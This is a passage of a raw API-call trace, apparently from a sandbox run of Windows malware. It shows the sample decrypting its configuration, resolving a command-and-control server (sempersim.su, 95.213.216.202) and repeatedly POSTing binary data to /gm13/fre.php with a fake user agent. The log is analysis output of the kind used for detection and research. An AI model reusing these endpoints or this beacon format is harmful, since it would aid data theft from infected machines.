(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0126.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0126.639] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0126.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0126.640] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0126.640] GetProcessHeap () returned 0x620000 [0126.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0126.641] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0126.641] GetProcessHeap () returned 0x620000 [0126.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0126.642] GetProcessHeap () returned 0x620000 [0126.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0126.642] GetProcessHeap () returned 0x620000 [0126.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643098 | out: hHeap=0x620000) returned 1 [0126.643] GetProcessHeap () returned 0x620000 [0126.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6433f8 [0126.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.644] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0126.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0126.663] GetProcessHeap () returned 0x620000 [0126.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0126.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.664] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0126.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.665] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0126.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.667] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0126.667] GetProcessHeap () returned 0x620000 [0126.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0126.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.673] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6433f8, pdwDataLen=0x19fcfc | out: pbData=0x6433f8, pdwDataLen=0x19fcfc) returned 1 [0126.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.674] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0126.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.675] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0126.675] GetProcessHeap () returned 0x620000 [0126.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0126.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0126.676] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0126.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0126.678] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0126.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0126.679] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0126.679] GetProcessHeap () returned 0x620000 [0126.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0126.679] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c3c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0126.687] GetProcessHeap () returned 0x620000 [0126.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b510 [0126.687] socket (af=2, type=1, protocol=6) returned 0x210 [0126.687] connect (s=0x210, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0126.745] FreeAddrInfoW (pAddrInfo=0x63c3c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0126.745] GetProcessHeap () returned 0x620000 [0126.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0126.745] GetProcessHeap () returned 0x620000 [0126.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0126.746] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0126.747] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0126.747] GetProcessHeap () returned 0x620000 [0126.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0126.747] GetProcessHeap () returned 0x620000 [0126.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0126.747] GetProcessHeap () returned 0x620000 [0126.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642ee8 [0126.747] GetProcessHeap () returned 0x620000 [0126.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0126.748] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0126.749] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0126.749] GetProcessHeap () returned 0x620000 [0126.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0126.749] GetProcessHeap () returned 0x620000 [0126.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0126.750] send (s=0x210, buf=0x63a880*, len=237, flags=0) returned 237 [0126.750] send (s=0x210, buf=0x6421e0*, len=159, flags=0) returned 159 [0126.750] GetProcessHeap () returned 0x620000 [0126.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0126.751] recv (in: s=0x210, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0128.427] GetProcessHeap () returned 0x620000 [0128.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0128.428] GetProcessHeap () returned 0x620000 [0128.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0128.428] GetProcessHeap () returned 0x620000 [0128.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0128.428] GetProcessHeap () returned 0x620000 [0128.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0128.429] closesocket (s=0x210) returned 0 [0128.429] GetProcessHeap () returned 0x620000 [0128.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b510 | out: hHeap=0x620000) returned 1 [0128.429] GetProcessHeap () returned 0x620000 [0128.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0128.430] GetProcessHeap () returned 0x620000 [0128.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0128.430] GetProcessHeap () returned 0x620000 [0128.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0128.430] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1124) returned 0x210 [0128.436] Sleep (dwMilliseconds=0xea60) [0128.450] GetProcessHeap () returned 0x620000 [0128.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0128.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.451] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0128.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.460] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0128.502] GetProcessHeap () returned 0x620000 [0128.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0128.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.503] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0128.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.504] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0128.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.505] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0128.505] GetProcessHeap () returned 0x620000 [0128.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0128.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.506] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0128.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.507] CryptDestroyKey (hKey=0x62d710) returned 1 [0128.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.508] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0128.508] GetProcessHeap () returned 0x620000 [0128.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0128.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0128.509] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0128.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0128.510] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0128.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0128.517] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0128.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0128.517] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0128.518] GetProcessHeap () returned 0x620000 [0128.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0128.518] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0128.518] GetProcessHeap () returned 0x620000 [0128.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0128.518] GetProcessHeap () returned 0x620000 [0128.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0128.519] GetProcessHeap () returned 0x620000 [0128.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0128.519] GetProcessHeap () returned 0x620000 [0128.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f78 [0128.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.520] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0128.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.525] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0128.537] GetProcessHeap () returned 0x620000 [0128.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0128.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.538] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0128.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.539] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0128.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.539] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0128.539] GetProcessHeap () returned 0x620000 [0128.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0128.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.541] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f78, pdwDataLen=0x19fcfc | out: pbData=0x642f78, pdwDataLen=0x19fcfc) returned 1 [0128.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.849] CryptDestroyKey (hKey=0x62d710) returned 1 [0128.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0128.851] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0128.851] GetProcessHeap () returned 0x620000 [0128.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0128.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0128.852] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0128.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0128.852] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0128.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0128.853] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0128.853] GetProcessHeap () returned 0x620000 [0128.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0128.853] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c280*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0128.855] GetProcessHeap () returned 0x620000 [0128.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0128.855] socket (af=2, type=1, protocol=6) returned 0x2c8 [0128.855] connect (s=0x2c8, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0128.908] FreeAddrInfoW (pAddrInfo=0x63c280*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0128.908] GetProcessHeap () returned 0x620000 [0128.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0128.908] GetProcessHeap () returned 0x620000 [0128.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0128.909] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0128.910] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0128.910] GetProcessHeap () returned 0x620000 [0128.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0128.910] GetProcessHeap () returned 0x620000 [0128.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0128.911] GetProcessHeap () returned 0x620000 [0128.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643368 [0128.911] GetProcessHeap () returned 0x620000 [0128.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0128.911] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0128.912] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0128.912] GetProcessHeap () returned 0x620000 [0128.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0128.912] GetProcessHeap () returned 0x620000 [0128.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0128.913] send (s=0x2c8, buf=0x63a880*, len=237, flags=0) returned 237 [0128.914] send (s=0x2c8, buf=0x6421e0*, len=159, flags=0) returned 159 [0128.914] GetProcessHeap () returned 0x620000 [0128.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0128.914] recv (in: s=0x2c8, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0130.722] GetProcessHeap () returned 0x620000 [0130.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0130.723] GetProcessHeap () returned 0x620000 [0130.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0130.723] GetProcessHeap () returned 0x620000 [0130.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0130.723] GetProcessHeap () returned 0x620000 [0130.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0130.724] closesocket (s=0x2c8) returned 0 [0130.724] GetProcessHeap () returned 0x620000 [0130.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0130.724] GetProcessHeap () returned 0x620000 [0130.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0130.725] GetProcessHeap () returned 0x620000 [0130.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f78 | out: hHeap=0x620000) returned 1 [0130.725] GetProcessHeap () returned 0x620000 [0130.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0130.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x558) returned 0x2c8 [0130.729] Sleep (dwMilliseconds=0xea60) [0130.747] GetProcessHeap () returned 0x620000 [0130.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0130.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.749] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0130.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.757] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0130.781] GetProcessHeap () returned 0x620000 [0130.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0130.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.782] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0130.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.784] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0130.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.785] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0130.785] GetProcessHeap () returned 0x620000 [0130.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0130.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.786] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0130.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.787] CryptDestroyKey (hKey=0x62d710) returned 1 [0130.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.788] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0130.788] GetProcessHeap () returned 0x620000 [0130.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0130.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0130.789] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0130.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0130.790] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0130.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0130.817] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0130.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0130.818] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0130.818] GetProcessHeap () returned 0x620000 [0130.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0130.818] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0130.819] GetProcessHeap () returned 0x620000 [0130.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0130.819] 